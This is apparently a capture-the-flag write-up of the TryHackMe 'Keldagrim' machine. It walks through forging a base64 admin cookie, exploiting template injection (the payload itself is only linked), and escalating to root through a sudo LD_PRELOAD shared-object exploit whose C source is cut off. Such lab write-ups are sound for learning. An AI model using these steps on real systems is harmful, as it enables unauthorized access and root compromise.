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TryHackMe | Keldagrim

Hello everyone,

I will explain the solution of the medium level machine as clearly as i work.

Let’s first scan for open ports and services with nmap.

sudo nmap -sSCV -T4 -v

The web application is running on port 80 and the ssh service is active. let’s switch to web application

here we see a cookie with base64. What happens if we change this?

It looks like there is an admin user and let’s try to set our cookie accordingly

└─$ echo -n Z3Vlc3Q= | base64 -d

└─$ echo -n admin | base64   

I’ve logged into admin. Since I don’t understand anything here, I tried to interrupt with the burp suite.

When we decoded the “sales” value, it gave us a result. this is the same result we just saw on the admin page.

└─$ echo -n JDIsMTY1 | base64 -d

Two things came to mind here. rce and ssti. I wanted to try the ssti because it made more sense.

I verified it’s ssti and created a payload to get the reverse shell.

Payload Link

Matching Defaults entries for jed on keldagrim:
    env_reset, mail_badpass,

User jed may run the following commands on keldagrim:
    (ALL : ALL) NOPASSWD: /bin/ps

I saw that the ps command works with sudo. but also that it belongs to the LD_PRELOAD environment

and I researched for privilege escalation

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {

I saved the c codes in the exploit.c file and ran the following commands in the terminal to switch to root session

gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
ls -al exploit.so
sudo LD_PRELOAD=/tmp/exploit.so ps

cat /root/root.txt && cat /home/jed/user.txt